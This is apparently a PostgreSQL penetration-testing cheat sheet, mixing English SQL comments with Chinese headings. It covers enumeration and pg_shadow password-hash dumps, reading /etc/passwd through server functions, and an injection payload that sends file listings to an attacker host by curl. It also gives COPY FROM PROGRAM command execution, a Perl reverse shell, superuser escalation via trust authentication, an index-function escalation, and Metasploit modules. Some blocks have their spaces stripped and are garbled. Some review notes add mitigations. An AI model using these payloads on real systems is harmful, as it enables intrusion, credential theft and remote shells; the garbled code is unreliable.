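# Open a psql console as the given role (local connection over the Unix socket)
psql -U <myuser>

# Remote connection; the password is prompted interactively
psql -h <host> -U <username> -d <database>

# Remote connection with an explicit port.
# NOTE: -W only forces a password prompt, it does NOT take the password as an
# argument. A password on the command line would be visible in the process
# list and in the shell history; use ~/.pgpass or the PGPASSWORD environment
# variable instead.
psql -h <host> -p <port> -U <username> -W <database>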
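-- Connect from a shell (the password is prompted; never pass it on the command line):
--   psql -h localhost -d <database_name> -U <User>

-- List databases
\list
-- Switch to a database
\c <database>
-- List tables
\d
-- List roles with their attributes and descriptions
\du+

-- Current user
SELECT user;
-- Current database
SELECT current_catalog;

-- List schemas (information_schema view, then the psql shortcut)
SELECT schema_name, schema_owner
FROM information_schema.schemata;
\dn+

-- List databases
SELECT datname
FROM pg_database;

-- Read credentials (usernames + password hashes).
-- pg_shadow is readable by superusers only; a permission error here is expected otherwise.
SELECT usename, passwd
FROM pg_shadow;

-- Get procedural languages and their ACLs
SELECT lanname, lanacl
FROM pg_language;

-- Show installed extensions
SHOW rds.extensions;            -- Amazon RDS specific parameter; errors on other servers
SELECT extname, extversion
FROM pg_extension;

-- Show the history of commands executed in this psql session
\s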
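-- Get user roles
\du

-- Get user roles & group membership.
-- r.rolpassword (always masked in pg_roles) and r.rolconfig are left out.
SELECT
    r.rolname,
    r.rolsuper,
    r.rolinherit,
    r.rolcreaterole,
    r.rolcreatedb,
    r.rolcanlogin,
    r.rolbypassrls,
    r.rolconnlimit,
    r.rolvaliduntil,
    r.oid,
    ARRAY(
        SELECT b.rolname
        FROM pg_catalog.pg_auth_members AS m
        INNER JOIN pg_catalog.pg_roles AS b ON m.roleid = b.oid
        WHERE m.member = r.oid
    ) AS memberof,
    r.rolreplication
FROM pg_catalog.pg_roles AS r
ORDER BY r.rolname;

-- Check if the current user is a superuser
-- "on" means true, "off" means false
SELECT current_setting('is_superuser');

-- Try to grant membership in the file/program roles.
-- This needs admin rights on the target role, superuser, or (version dependent)
-- the CREATEROLE attribute (see next section).
GRANT pg_execute_server_program TO "username";
GRANT pg_read_server_files TO "username";
GRANT pg_write_server_files TO "username";
-- You will probably get this error:
--   Cannot GRANT on the "pg_write_server_files" role without being a member of the role.

-- Create a new role (user) as a member of a role (group).
-- IN ROLE is the current spelling; IN GROUP is an obsolete synonym.
-- Use a placeholder here: do not commit a literal password into a script.
CREATE ROLE u LOGIN PASSWORD '<strong-random-password>' IN ROLE pg_read_server_files;
-- Common error:
--   Cannot GRANT on the "pg_read_server_files" role without being a member of the role.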
表格
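-- Get owners of tables
SELECT schemaname, tablename, tableowner
FROM pg_tables;

-- Get tables owned by a given role (postgres in this example)
SELECT schemaname, tablename, tableowner
FROM pg_tables
WHERE tableowner = 'postgres';

-- Get your permissions over tables
SELECT grantee, table_schema, table_name, privilege_type
FROM information_schema.role_table_grants;

-- Check privileges over one table (pg_shadow in this example).
-- An empty result means no grant involving your roles exists on it
-- (this view only lists grants where a role you belong to is grantor or grantee).
SELECT grantee, table_schema, table_name, privilege_type
FROM information_schema.role_table_grants
WHERE table_name = 'pg_shadow';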
函数
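-- Interesting functions live in pg_catalog
-- List all functions
\df *
-- Filter by name substring
\df *pg_ls*
-- The "+" form also shows the ACL, i.e. who may execute the function
\df+ pg_read_binary_file

-- All functions of a schema (pg_catalog in this case), psql way
\df pg_catalog.*

-- Same listing through information_schema, with parameter types
SELECT
    routines.routine_name,
    parameters.data_type,
    parameters.ordinal_position
FROM information_schema.routines
LEFT JOIN information_schema.parameters
    ON routines.specific_name = parameters.specific_name
WHERE routines.specific_schema = 'pg_catalog'
ORDER BY routines.routine_name, parameters.ordinal_position;

-- Another apparent option: the raw catalog (proacl holds the execute ACL)
SELECT proname, pronamespace, proacl
FROM pg_proc;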
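-- Run these from the postgres database (not template1):
\c postgres
-- otherwise you may get a "permission denied" error even when you do have the permission

-- Read the server file system through the built-in functions
SELECT * FROM pg_ls_dir('/tmp');
SELECT * FROM pg_read_file('/etc/passwd', 0, 1000000);
SELECT * FROM pg_read_binary_file('/etc/passwd');

-- Check who has EXECUTE on them (the "+" form shows the ACL)
\df+ pg_ls_dir
\df+ pg_read_file
\df+ pg_read_binary_file

-- Try to grant execute permission (only the function owner or a superuser can)
GRANT EXECUTE ON FUNCTION pg_catalog.pg_ls_dir(text) TO username;

-- By default these functions can only reach files under the data directory
SHOW data_directory;

-- Members of pg_read_server_files can read any file the server OS user can read,
-- so membership in that role should be audited (\du) and granted sparingly
GRANT pg_read_server_files TO username;

-- Also review the CREATEROLE privilege escalation (next section)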
'; copy (SELECT '') to program 'curl http://YOUR-SERVER?f=`ls -l|base64`'-- -
示例执行:
#PoCDROPTABLEIFEXISTScmd_exec;CREATETABLEcmd_exec(cmd_outputtext);COPYcmd_execFROMPROGRAM'id';SELECT*FROMcmd_exec;DROPTABLEIFEXISTScmd_exec;#Reverse shell#Notice that in order to scape a single quote you need to put 2 single quotesCOPYfilesFROMPROGRAM'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.0.104:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;''';
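-- Predefined roles that expose the server's operating system. They can only be
-- granted by a superuser or a role with admin rights on them (see the errors in
-- the roles section); grant sparingly and audit membership with \du.

-- Access to execute OS commands (COPY ... FROM/TO PROGRAM)
GRANT pg_execute_server_program TO username;
-- Access to read any file the server OS user can read
GRANT pg_read_server_files TO username;
-- Access to write files
GRANT pg_write_server_files TO username;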
-- NOTE(review): this only succeeds because the local psql invocation is not
-- challenged for a password, i.e. pg_hba.conf uses "trust" for local/loopback
-- connections (shown below). It also requires COPY ... TO PROGRAM rights
-- (superuser or pg_execute_server_program). Fix: use "peer" for the local
-- socket line and "scram-sha-256" for the loopback lines.
COPY (select'') to PROGRAM 'psql -U <super_user> -c "ALTER USER <your_username> WITH SUPERUSER;"';
这通常是因为 pg_hba.conf 文件中的以下行:
# "local" is for Unix domain socket connections onlylocal all all trust# IPv4 local connections:hostallall127.0.0.1/32trust# IPv6 local connections:hostallall::1/128trust
-- NOTE(review): privilege escalation through an index expression. The lever is
-- the ALTER TABLE ... OWNER TO cloudsqladmin step: in unpatched versions,
-- ANALYZE evaluated the (now VOLATILE) index function with the table owner's
-- privileges, so COPY ... FROM PROGRAM ran as a privileged role. Mitigations:
-- keep the server on a current minor release (upstream hardened maintenance
-- commands against untrusted index expressions), revoke CREATE on the public
-- schema from PUBLIC (the default since PostgreSQL 15), and alert on
-- CREATE OR REPLACE FUNCTION / OWNER TO statements in the logs.
CREATETABLEtemp_table (datatext);CREATETABLEshell_commands_results (datatext);INSERT INTO temp_table VALUES ('dummy content');/* PostgreSQL does not allow creating a VOLATILE index function, so first we create IMMUTABLE index function */CREATE OR REPLACEFUNCTIONpublic.suid_function(text) RETURNStextLANGUAGEsql IMMUTABLE AS'select ''nothing'';';CREATEINDEXindex_maliciousON public.temp_table (suid_function(data));ALTERTABLE temp_table OWNERTO cloudsqladmin;/* Replace the function with VOLATILE index function to bypass the PostgreSQL restriction */CREATE OR REPLACEFUNCTIONpublic.suid_function(text) RETURNStextLANGUAGEsql VOLATILE AS'COPY public.shell_commands_results (data) FROM PROGRAM ''/usr/bin/id''; select ''test'';';ANALYZE public.temp_table;
一些配置错误的 postgresql 实例可能允许任何本地用户登录,可以使用 dblink function 从 127.0.0.1 本地登录:
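-- Get users
\du *
-- Get databases
\l

-- Log in locally through dblink with explicit credentials.
-- dblink returns SETOF record, so the output columns must be declared with
-- AS t(...) and must match the columns of the remote query (two here).
-- The connection-string keys are space separated.
-- The password is a literal inside the statement and will show up in
-- statement logs and psql history.
SELECT *
FROM dblink(
    'host=127.0.0.1 port=5432 user=someuser password=supersecret dbname=somedb',
    'SELECT usename, passwd FROM pg_shadow'
) AS t(usename text, passwd text);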
请注意,之前的查询要正常工作需要存在函数 dblink。如果不存在,您可以尝试使用以下命令创建它。
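-- dblink is not marked as a trusted extension, so this normally needs a superuser.
-- IF NOT EXISTS keeps the statement idempotent.
CREATE EXTENSION IF NOT EXISTS dblink;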
如果您拥有具有更高权限的用户的密码,但该用户不允许从外部 IP 登录,您可以使用以下函数以该用户的身份执行查询:
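-- Run a query through a loopback connection as a more privileged user whose
-- password is known. A non-superuser must supply the password in the
-- connection string (dblink refuses non-password connections otherwise).
-- The output columns are declared with AS t(...) to match the remote query.
SELECT *
FROM dblink(
    'host=127.0.0.1 user=someuser password=<password> dbname=somedb',
    'SELECT usename, passwd FROM pg_shadow'
) AS t(usename text, passwd text);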
可以通过以下方式检查此函数是否存在:
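-- Check whether the two-argument dblink(text, text) function exists
SELECT oid, proname, pronargs
FROM pg_proc
WHERE proname = 'dblink' AND pronargs = 2;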
msf> use auxiliary/scanner/postgres/postgres_hashdump
msf> use auxiliary/scanner/postgres/postgres_schemadump
msf> use auxiliary/admin/postgres/postgres_readfile
msf> use exploit/linux/postgres/postgres_payload
msf> use exploit/windows/postgres/postgres_payload
logging
在 postgresql.conf 文件中,您可以通过更改来启用 postgresql 日志:
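# Enable statement logging in postgresql.conf
log_statement = 'all'
log_filename = 'postgresql-%Y-%m-%d_%H%M%S.log'
logging_collector = on

# logging_collector only takes effect after a server restart:
#   sudo service postgresql restart

# Find the logs in /var/lib/postgresql/<PG_Version>/main/log/
# or in /var/lib/postgresql/<PG_Version>/main/pg_log/

# NOTE(review): log_statement = 'all' also records statements that carry
# secrets (CREATE ROLE ... PASSWORD, dblink connection strings, etc.), so
# restrict read access to the log directory to the postgres OS user.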